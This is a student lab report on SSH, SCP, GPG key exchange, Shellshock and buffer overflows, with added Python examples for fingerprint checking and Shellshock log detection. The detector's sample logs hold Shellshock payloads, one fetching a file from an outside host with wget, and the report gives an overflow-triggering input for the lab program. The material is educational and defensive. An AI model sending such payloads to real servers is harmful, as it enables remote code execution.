Apr 20th, 2016
### CprE 308 Report - Lab 12
##### By: Thomas Moll - Lab Section B

#### Part 1: SSH

##### 3.1.2
After running `ls` over ssh on linux-1.ece.iastate.edu, the output is:
~~~
[~/cpre308]
quanta-> ls
Debian-Jessie-AMD64-root_fs labs linux-4.4.3 newfile setup_labs.sh
~~~
The output is coming from the remote machine.

~~~
[~]
quanta-> ssh -l quanta linux-1.ece.iastate.edu
quanta@linux-1.ece.iastate.edu's password:

Logged into linux-1.ece.iastate.edu
Welcome Thomas
[~]
quanta->
~~~

~~~
[~]
quanta-> ssh quanta@linux-1.ece.iastate.edu
quanta@linux-1.ece.iastate.edu's password:

Logged into linux-1.ece.iastate.edu
Welcome Thomas
[~]
quanta->
~~~
Both are functionally the same: `-l quanta` and `quanta@` are two ways of giving the remote login name.

##### 3.1.3
SCP command to linux-1 to get a test file.
~~~
[~/cpre308]
quanta-> scp quanta@linux-1.ece.iastate.edu:cpre308/SCP_Test.txt .
quanta@linux-1.ece.iastate.edu's password:
SCP_Test.txt 100% 0 0.0KB/s 00:00

[~/cpre308]
quanta-> cat SCP_Test.txt
HELLO WORLD!
~~~

SCP command to a more remote server to get another test file.
~~~
[~/cpre308]
quanta-> scp thomas@thomasmoll.co:SCP_Test.txt .
thomas@thomasmoll.co's password:
SCP_Test.txt 100% 13 0.0KB/s 00:00

[~/cpre308]
quanta-> cat SCP_Test.txt
HELLO WORLD!
~~~


Using the ssh escape sequence `~^Z` (typed at the start of a line inside the remote session) to suspend `ssh`, then `scp` on the local machine and `fg` to resume the session, we have the following. Running `hostname` at the end confirms that after `fg` the prompt is back on the remote host.
~~~
quanta-> ssh linux-1.ece.iastate.edu
[~]
quanta-> ~^Z [suspend ssh]

[1]+ Stopped ssh linux-1.ece.iastate.edu
[~/cpre308]
quanta-> scp thomas@thomasmoll.co:SCP_Test.txt .
thomas@thomasmoll.co's password:
SCP_Test.txt 100% 13 0.0KB/s 00:00
[~/cpre308]
quanta-> fg
ssh linux-1.ece.iastate.edu

[~]
quanta-> hostname
linux-1.ece.iastate.edu
[~]
quanta->
~~~



##### 3.1.4

Below is the entry for one of my hosts from my `known_hosts` file: the server's public host key, recorded once under its hostname and once under its IP address. Pls don't haxor me.
~~~
thomasmoll.co ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
192.73.234.28 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
~~~

In the `.ssh` directory, the file `id_rsa` contains my private key and the file `id_rsa.pub` contains my public key.
The passphrase is used to encrypt `id_rsa`, so a rogue program that copies the file still cannot impersonate me without also knowing the passphrase.
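As an added example (not part of the lab report), here is a Python script that parses the two `known_hosts` lines above, decodes the `ssh-rsa` blob in its wire format, and computes the key's fingerprint in both forms OpenSSH shows: the `SHA256:` form of current `ssh-keygen -lf`, and the older colon-separated MD5 form that appears in the `RSA key fingerprint is ...` prompt later in this report. The host key is copied from the report; everything else (the function names, the check that the hostname and IP entries carry the same key) is this example's own.

```python
import base64
import hashlib
import struct

# Two known_hosts entries copied from the lab report above (same host,
# recorded once by name and once by IP).  Everything else in this file
# is assumed for the example and is not part of the original lab.
KNOWN_HOSTS = """\
thomasmoll.co ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
192.73.234.28 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7ZrKnGcCgipIytH35H8t2Ak4gGFG2xzfFFqMpAwgFOPj0w6rV22ql/GvyR+T5GKAcbmH3C0iKsXRQRQAPDEsiSanDEZxt7+92SbiySfToDO1hHPpZkZqyuYyNjQvFkeL6jXqKeyb5uArPLw5HxQjFXnkEEIg85ljsQ7vAluCrquM0rmEUy7AhsE1FNVRuHL7YH04MM0ZYrbWcYz1D6i+QwYqKMVGVQIB4ecpe7pG/u6iM8/BCw+25BtU+sXHwylkTuJicZFf6z7wstbmbNINpqMcmpkx9momY769m6aLU1ZWShHYyQmIFcKAcMTUqmNlOXZ9YGbHWRRxVjk8nUf1x
"""


def _read_string(blob, off):
    """Read one SSH wire-format string: a big-endian uint32 length, then that many bytes."""
    if off + 4 > len(blob):
        raise ValueError("truncated key blob")
    (n,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    if off + n > len(blob):
        raise ValueError("truncated key blob")
    return blob[off:off + n], off + n


def parse_ssh_rsa(b64blob):
    """Decode an ssh-rsa public key blob into (e, n, raw_bytes).

    Wire format (RFC 4253 section 6.6): string "ssh-rsa", mpint e, mpint n.
    Missing base64 padding is tolerated because known_hosts lines omit it.
    """
    raw = base64.b64decode(b64blob + "=" * (-len(b64blob) % 4))
    ktype, off = _read_string(raw, 0)
    if ktype != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key: %r" % ktype)
    e_bytes, off = _read_string(raw, off)
    n_bytes, off = _read_string(raw, off)
    if off != len(raw):
        raise ValueError("trailing bytes after modulus")
    return int.from_bytes(e_bytes, "big"), int.from_bytes(n_bytes, "big"), raw


def fingerprints(raw):
    """Return (sha256_fp, md5_fp) for the raw key blob, in OpenSSH's display formats.

    SHA256: base64 of the digest with '=' padding stripped (what ssh-keygen -lf prints).
    MD5: colon-separated hex, the format the 2016-era client in this report prints.
    """
    sha = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    md5 = hashlib.md5(raw).hexdigest()
    return "SHA256:" + sha, ":".join(md5[i:i + 2] for i in range(0, 32, 2))


def parse_known_hosts(text):
    """Parse known_hosts text into a list of dicts, one per ssh-rsa entry.

    The host field may be a comma-separated list of names; hashed entries
    ('|1|salt|hash') are kept as-is because they cannot be reversed.
    Lines with @cert-authority / @revoked markers have the marker dropped.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0].startswith("@"):
            parts = parts[1:]
        hosts, ktype, blob = parts[0], parts[1], parts[2]
        if ktype != "ssh-rsa":
            continue  # this example only parses RSA host keys
        e, n, raw = parse_ssh_rsa(blob)
        sha_fp, md5_fp = fingerprints(raw)
        entries.append({"hosts": hosts.split(","), "type": ktype, "e": e,
                        "bits": n.bit_length(), "sha256": sha_fp, "md5": md5_fp})
    return entries


def hosts_sharing_key(text):
    """Group host names by SHA256 fingerprint, to see one key recorded under several names."""
    by_fp = {}
    for entry in parse_known_hosts(text):
        by_fp.setdefault(entry["sha256"], []).extend(entry["hosts"])
    return by_fp


if __name__ == "__main__":
    for entry in parse_known_hosts(KNOWN_HOSTS):
        print(entry["hosts"], entry["type"], entry["bits"], "e=%d" % entry["e"])
        print("  ", entry["sha256"])
        print("  ", entry["md5"])
```

Comparing the fingerprint computed from the stored entry with the one the server presents on first connection (or with one published out of band) is what makes the `Are you sure you want to continue connecting` prompt meaningful. The MD5 form is included only because that is what the client in this report prints; it should not be relied on today.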

##### 3.1.7
Since my home directory is mapped, the keys were already transferred to the lab machine.
I don't need to input my actual password now!

The passphrase decrypts my private key locally so the client can prove possession of it to the server. It is never sent to the server; it only unlocks the key on my end. With `ssh-agent`, the key is unlocked once by `ssh-add` and then reused for later logins.

~~~
quanta-> ssh-agent bash
bash-4.1$ ssh-add ~/.ssh/lab_key
Enter passphrase for /home/quanta/.ssh/lab_key:
Identity added: /home/quanta/.ssh/lab_key (/home/quanta/.ssh/lab_key)
bash-4.1$ ssh linux-3.ece.iastate.edu

Logged into linux-3.ece.iastate.edu
Welcome Thomas
[~]
quanta->
~~~

##### 3.2.1

GnuPG. For this part I had to use my own VPS because the lab computers don't have enough entropy.
~~~
thomas@quantumserver [11:25:58] [~]
-> % gpg --gen-key
gpg (GnuPG) 1.4.18; Copyright (C) 2014 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Please select what kind of key you want:
(1) RSA and RSA (default)
(2) DSA and Elgamal
(3) DSA (sign only)
(4) RSA (sign only)
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
0 = key does not expire
<n> = key expires in n days
<n>w = key expires in n weeks
<n>m = key expires in n months
<n>y = key expires in n years
Key is valid for? (0)
Key does not expire at all
Is this correct? (y/N) y

You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"

Real name: Thomas Moll
Email address: quanta@iastate.edu
Comment: Lab12
You selected this USER-ID:
"Thomas Moll (Lab12) <quanta@iastate.edu>"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
You need a Passphrase to protect your secret key.

We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
...+++++
.....+++++
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
.......+++++
+++++
gpg: key 83D22B6D marked as ultimately trusted
public and secret key created and signed.

gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0 valid: 2 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 2u
pub 2048R/83D22B6D 2016-04-20
Key fingerprint = FF79 AF8A 5A50 64FD 308A DF99 6143 100E 83D2 2B6D
uid Thomas Moll (Lab12) <quanta@iastate.edu>
sub 2048R/3E685551 2016-04-20
~~~

~~~
-> % scp michael@michaelsnook.us:/home/michael/myname.gpg .
The authenticity of host 'michaelsnook.us (107.161.17.147)' can't be established.
RSA key fingerprint is 4a:8d:af:74:2d:2d:5b:53:f6:85:59:72:26:a8:59:4b.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'michaelsnook.us,107.161.17.147' (RSA) to the list of known hosts.
michael@michaelsnook.us's password:
myname.gpg 100% 1216 1.2KB/s 00:00
(env) thomas@quantumserver [12:11:47] [~]
-> % ls
Python-3.5.0 gunicorn.conf nginx-4-12-16.tar.gz repos web
Python-3.5.0.tgz myname.gpg projects tom-home-4-12-16.tar.gz werc
SCP_Test.txt nginx python tom-key.gpg
(env) thomas@quantumserver [12:11:49] [~]
-> % gpg --install myname.gpg
gpg: Invalid option "--install"
(env) thomas@quantumserver [12:12:04] [~]
-> % gpg --import myname.gpg
gpg: key 68DAA02C: public key "Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>" imported
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
(env) thomas@quantumserver [12:12:10] [~]
-> % gpg --list-keys
/home/thomas/.gnupg/pubring.gpg
-------------------------------
pub 2048R/985B5355 2016-04-20
uid Thomas Moll (Lab12) <quanta@iastate.edu>
sub 2048R/C1FB4BB2 2016-04-20

pub 2048R/83D22B6D 2016-04-20
uid Thomas Moll (Lab12) <quanta@iastate.edu>
sub 2048R/3E685551 2016-04-20

pub 2048R/68DAA02C 2016-04-20
uid Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>
sub 2048R/F535694D 2016-04-20

~~~

After we exchanged keys, I encrypted a file and sent it to him. We used SCP to transfer the files.
~~~
(env) thomas@quantumserver [12:15:07] [~]
-> % gpg --output secret.gpg --encrypt --recipient snook secret.txt
gpg: F535694D: There is no assurance this key belongs to the named user

pub 2048R/F535694D 2016-04-20 Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>
Primary key fingerprint: 6A93 F1A9 C4C7 3C9E A681 BE96 9AF3 4E2A 68DA A02C
Subkey fingerprint: CE6D 6F45 0F49 6F90 4AC6 942B DADA 8F87 F535 694D

It is NOT certain that the key belongs to the person named
in the user ID. If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y
~~~

I then decrypted his document. Note that the process is the same for the keys; they're just files!
~~~
(env) thomas@quantumserver [12:21:32] [~]
-> % scp michael@michaelsnook.us:/home/michael/doc.gpg .
michael@michaelsnook.us's password:
doc.gpg 100% 379 0.4KB/s 00:00
gpg: Invalid option "--ouptput"
(env) thomas@quantumserver [12:22:36] [~]
-> % gpg --output doc.txt --decrypt doc.gpg

You need a passphrase to unlock the secret key for
user: "Thomas Moll (Lab12) <quanta@iastate.edu>"
2048-bit RSA key, ID C1FB4BB2, created 2016-04-20 (main key ID 985B5355)

gpg: encrypted with 2048-bit RSA key, ID C1FB4BB2, created 2016-04-20
"Thomas Moll (Lab12) <quanta@iastate.edu>"

(env) thomas@quantumserver [12:23:49] [~]
-> % cat doc.txt
Hey Tom! I hope you are doing well.
~~~

##### 3.2.4

We then signed files and verified each other's signatures.

We used SCP to share the new files.
~~~
(env) thomas@quantumserver [12:24:48] [~]
-> % gpg --output signed.gpg --sign tom-key.gpg

You need a passphrase to unlock the secret key for
user: "Thomas Moll (Lab12) <quanta@iastate.edu>"
2048-bit RSA key, ID 985B5355, created 2016-04-20
~~~


I verified his signature.
~~~
(env) thomas@quantumserver [12:29:59] [~]
-> % scp michael@michaelsnook.us:/home/michael/myname_signed.gpg .
michael@michaelsnook.us's password:
myname_signed.gpg 100% 1544 1.5KB/s 00:00
(env) thomas@quantumserver [12:34:01] [~]
-> % ls
Python-3.5.0 doc.gpg myname_signed.gpg pub.gpg secret.txt web
Python-3.5.0.tgz doc.txt nginx python signed.gpg werc
SCP_Test.txt gunicorn.conf nginx-4-12-16.tar.gz repos tom-home-4-12-16.tar.gz
doc. myname.gpg projects secret.gpg tom-key.gpg
(env) thomas@quantumserver [12:34:03] [~]
-> % gpg --ouptput key.gpg --decrypt myname_signed.gpg
gpg: Invalid option "--ouptput"
(env) thomas@quantumserver [12:34:29] [~]
-> % gpg --output key.gpg --decrypt myname_signed.gpg
gpg: Signature made Wed Apr 20 12:32:29 2016 EDT using RSA key ID 68DAA02C
gpg: Good signature from "Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 6A93 F1A9 C4C7 3C9E A681 BE96 9AF3 4E2A 68DA A02C
~~~
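Both the encryption step in 3.2.1 (`There is no assurance this key belongs to the named user`) and the verification step above (`This key is not certified with a trusted signature`) warn that gpg has no reason to believe key 68DAA02C really belongs to Michael. The check that silences the warning honestly is to compare the full 40-hex-digit fingerprint with one obtained out of band (in person, over the phone) and then certify the key locally with `gpg --lsign-key <fingerprint>`; the 8-digit key ID alone is not enough, since it is only the last 32 bits of the fingerprint and keys with a chosen short ID can be generated. The Python below is an added example, not part of the lab: it parses the machine-readable `gpg --with-colons --fingerprint` layout and performs that comparison. The sample output is constructed from the key IDs, fingerprints and user ID shown in the transcripts above; the creation timestamps are assumed, and the 16-digit long key IDs are simply the last 16 digits of the fingerprints.

```python
import re

# Output in the layout of `gpg --with-colons --fingerprint --fingerprint`,
# constructed for this example from the lab transcript: the fingerprints,
# the user ID and the dates are the ones shown above; the epoch timestamps
# are assumed, and the long key IDs are the last 16 hex digits of each
# fingerprint (which is how v4 OpenPGP key IDs are defined).
GPG_COLONS = """\
tru::1:1461171600:0:3:1:5
pub:-:2048:1:9AF34E2A68DAA02C:1461110400:::-:::scESC:
fpr:::::::::6A93F1A9C4C73C9EA681BE969AF34E2A68DAA02C:
uid:-::::1461110400::::Michael Snook (This is for lab 12 of CPRE308) <snook@iastate.edu>:
sub:-:2048:1:DADA8F87F535694D:1461110400::::::e:
fpr:::::::::CE6D6F450F496F904AC6942BDADA8F87F535694D:
"""


def parse_gpg_colons(text):
    """Map long key ID -> {'type': 'pub'|'sub', 'fpr': ..., 'uids': [...]}.

    In --with-colons output the key ID is field 5 of a pub/sub record, the
    fingerprint is field 10 of the 'fpr' record that follows it, and the
    user ID is field 10 of a 'uid' record.  Fields are 1-indexed in the
    GnuPG docs, hence the [4] and [9] below.
    """
    keys, current = {}, None
    for line in text.splitlines():
        f = line.split(":")
        if f[0] in ("pub", "sub"):
            current = f[4]
            keys[current] = {"type": f[0], "fpr": None, "uids": []}
        elif f[0] == "fpr" and current is not None:
            keys[current]["fpr"] = f[9].upper()
        elif f[0] == "uid" and current is not None:
            keys[current]["uids"].append(f[9])
    return keys


def normalize_hex(s):
    """Strip the spaces gpg prints and an optional 0x prefix; upper-case the rest."""
    s = s.strip()
    if s.lower().startswith("0x"):
        s = s[2:]
    return re.sub(r"[^0-9A-Fa-f]", "", s).upper()


def find_by_keyid(keys, keyid):
    """Return every (long_id, entry) whose fingerprint ends with the given ID.

    Short (8), long (16) and full (40) IDs all work because each is a suffix
    of the fingerprint; a short ID can legitimately match more than one key.
    """
    needle = normalize_hex(keyid)
    if not needle:
        return []
    return [(kid, k) for kid, k in keys.items()
            if k["fpr"] and k["fpr"].endswith(needle)]


def key_matches(colons_text, keyid, expected_fpr):
    """True only if exactly one key carries this ID and its full fingerprint
    equals the one obtained out of band.  Anything shorter than 40 hex digits
    is rejected as an expected value, so a key ID cannot be passed by mistake."""
    expected = normalize_hex(expected_fpr)
    if len(expected) != 40:
        return False
    matches = find_by_keyid(parse_gpg_colons(colons_text), keyid)
    if len(matches) != 1:
        return False
    return matches[0][1]["fpr"] == expected


if __name__ == "__main__":
    # The fingerprint Michael would read out over the phone, copied from the transcript.
    ok = key_matches(GPG_COLONS, "68DAA02C",
                     "6A93 F1A9 C4C7 3C9E A681 BE96 9AF3 4E2A 68DA A02C")
    print("fingerprint verified" if ok else "MISMATCH: do not sign this key")
```

Only once `key_matches` returns true does it make sense to run `gpg --lsign-key 6A93F1A9C4C73C9EA681BE969AF34E2A68DAA02C`; after that gpg treats the key as valid and the two warnings disappear for the right reason rather than by answering `y` to "Use this key anyway?".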

##### 3.3
Shellshock (CVE-2014-6271) was caused by the way bash imports functions from the environment. On startup bash scans every environment variable, and a value that begins with `() {` is parsed as a function definition; vulnerable versions kept parsing past the closing brace and executed whatever followed it. So any program that copies attacker-controlled input into an environment variable and then spawns bash (directly, or via `system()`/`popen()` on systems where `/bin/sh` is bash) runs the attacker's command. The bug is in bash, not in the program reading the variable: a `getenv()` call executes nothing; the payload runs the moment bash starts. The classic case is a CGI web server, which puts request headers such as `User-Agent` into variables like `HTTP_USER_AGENT` before running the script, so a header of `() { :;}; /bin/bash -c '...'` ran the command on the server. The same applies to a web app that saves a user's Language setting without sanitizing it (client-side JavaScript validation does not count): if that value is later passed through the environment to a bash script, the payload runs the next time the program looks up the language.
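As an added example (not from the lab), the Python below shows both halves of that chain: how a CGI server turns request headers into environment variables (the RFC 3875 `HTTP_` mapping), and a detector that recognises the `() {` trigger, recovers the command an unpatched bash would have run, and scans Apache combined-format access log lines for it. The log lines are constructed for the example; the regexes and function names are this example's own, and the whitespace tolerance in the signature is an assumption made to catch obfuscated variants rather than bash's exact original check.

```python
import re

# Broad signature for the Shellshock trigger: bash treated an environment
# value beginning with "() {" as an exported function definition.  Allowing
# whitespace around the tokens is this example's assumption, to catch
# obfuscated variants; bash's original check was an exact "() {" prefix.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

# Apache combined log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')


def cgi_env_name(header):
    """RFC 3875 mapping of an HTTP header name to its CGI meta-variable name."""
    return "HTTP_" + header.strip().upper().replace("-", "_")


def cgi_env_from_headers(headers):
    """The header-derived part of the environment a CGI server hands to the script.

    This is the trust boundary: every value here is attacker-controlled, and a
    script written in (or shelling out to) bash will import any of them that
    looks like a function definition.
    """
    return {cgi_env_name(k): v for k, v in headers.items()}


def is_shellshock_payload(value):
    return bool(SHELLSHOCK_RE.match(value))


def trailing_command(value):
    """Return the text a vulnerable bash executed: whatever follows the closing
    brace of the function body, minus the ';' separator.  None if the value
    does not look like a function definition at all."""
    if not is_shellshock_payload(value):
        return None
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return value[i + 1:].lstrip(" ;\t")
    return None  # unbalanced braces: bash would have rejected the definition


def scan_access_log(lines):
    """Return (line_number, source_ip, field, command) for each log line whose
    referer or user-agent carries a Shellshock payload."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "agent"):
            cmd = trailing_command(m.group(field))
            if cmd is not None:
                hits.append((lineno, m.group("host"), field, cmd))
    return hits


# Constructed sample log lines (not from the lab).  The payload shapes are the
# ones that were seen against CGI scripts in September 2014.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Sep/2014:10:01:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /usr/bin/wget http://198.51.100.9/x -O /tmp/x"',
    '198.51.100.9 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { ignored;}; /usr/bin/id" "curl/7.37"',
]

if __name__ == "__main__":
    print(cgi_env_from_headers({"User-Agent": "() { :;}; /usr/bin/id", "Accept": "*/*"}))
    for lineno, ip, field, cmd in scan_access_log(SAMPLE_LOG):
        print("line %d from %s, %s header would run: %s" % (lineno, ip, field, cmd))
```

The detector reports the command rather than just the match because, in incident response, the trailing command (typically a download-and-execute or a reverse shell) is what tells you which hosts to look at next; the environment mapping is included because it is the step the lab's explanation skips over.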

##### 3.4
Buffer overflows! In the lab program an attacker can trigger one simply by sending a long run of parentheses such as `(((((((((((((((((((((((((((((((((((((((()))))))))))))))))))))))))))))))))))))))))`: every `(` bumps the `upperlimit` counter and writes into a fixed-size buffer, and because nothing bounds the counter (it never gets decremented), it keeps growing until it indexes past the end of the buffer.
Writes past the end of a buffer land on whatever the compiler placed after it; for a stack buffer that is typically other locals, the saved frame pointer and the return address, which is why attacker-controlled data can redirect control flow.
From there arbitrary code can be injected and possibly run. The fix is a bounds check before each write: stop consuming input once the counter reaches the buffer's capacity.

##### Summary

In summary, I've learned a fair bit about SSH, SCP, GPG and buffer overflows. I've known about SSH, SCP and GPG for a while now. However, I didn't know about the escape command to temporarily run commands on the actual host you're running on. GPG I've used to encrypt my email for a number of years because I'm a bit paranoid about my communications (unfortunately, I haven't figured out how to do this on iastate's email :().

I did learn a lot about buffer overflows from the provided material. I learned that they're the most widely used exploit because, damn, it's simple. Unlike stack pivoting, which takes finesse, buffer overflows are simple; especially paired with executable flags and shellcode, the world is your oyster.